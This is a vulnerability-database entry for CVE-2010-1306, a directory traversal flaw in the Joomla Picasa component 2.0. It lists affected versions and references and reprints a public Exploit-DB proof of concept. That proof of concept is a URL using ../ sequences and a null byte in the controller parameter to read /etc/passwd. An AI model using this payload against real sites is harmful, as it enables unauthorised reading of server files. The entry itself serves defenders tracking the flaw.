CVE-2010-1306
Description
Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component Picasa 2.0 - Local File Inclusion
# Exploit Title: Joomla Component Picasa 2.0 LFI Vulnerability
# Date: Monday, 05 April 2010
# Author: Vrs-hCk
# Software Link: http://prof3ta.netsons.org/
# Version: Joomla Component Picasa version 2.0
# Tested on:
# CVE :
# Code :
================================================================================================
Title : Joomla Component Picasa 2.0 LFI Vulnerability
Software : com_joomlapicasa2 version 2.0
Vendor : http://prof3ta.netsons.org/
Date : Monday, 05 April 2010 (Indonesia)
Author : Vrs-hCk
Contact : ander[at]antisecurity.org
Blog : http://c0li.blogspot.com/
================================================================================================
[+] Exploit
http://[site]/[path]/index.php?option=com_joomlapicasa2&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00
================================================================================================
Greetz :
www.MainHack.net - www.ServerIsDown.org - www.AntiSecurity.org
Paman, NoGe, OoN_Boy, pizzyroot, zxvf, matthews, Genex, s4va, stardustmemory,
wishnusakti, bl4Ck_3n91n3, H312Y, S3T4N, xr00tb0y, str0ke, dkk.
================================================================================================
# c0li.m0de.0n
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| roberto_aloi | com_joomlapicasa2 | 2.0.0 | |
| roberto_aloi | com_joomlapicasa2 | 2.0.1 | |
| roberto_aloi | com_joomlapicasa2 | 2.0.2 | |
| roberto_aloi | com_joomlapicasa2 | 2.0.3 | |
| roberto_aloi | com_joomlapicasa2 | 2.0.4 | |
| roberto_aloi | com_joomlapicasa2 | 2.0.5 | |
| joomla | joomla\! | | |
References
- http://packetstormsecurity.org/1004-exploits/joomlapicasa-lfi.txt
- http://secunia.com/advisories/39338
- http://www.exploit-db.com/exploits/12058
- http://www.securityfocus.com/bid/39200
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57508
- http://packetstormsecurity.org/1004-exploits/joomlapicasa-lfi.txt
- http://secunia.com/advisories/39338
- http://www.exploit-db.com/exploits/12058
- http://www.securityfocus.com/bid/39200
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57508
CWEs
CWE-22
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.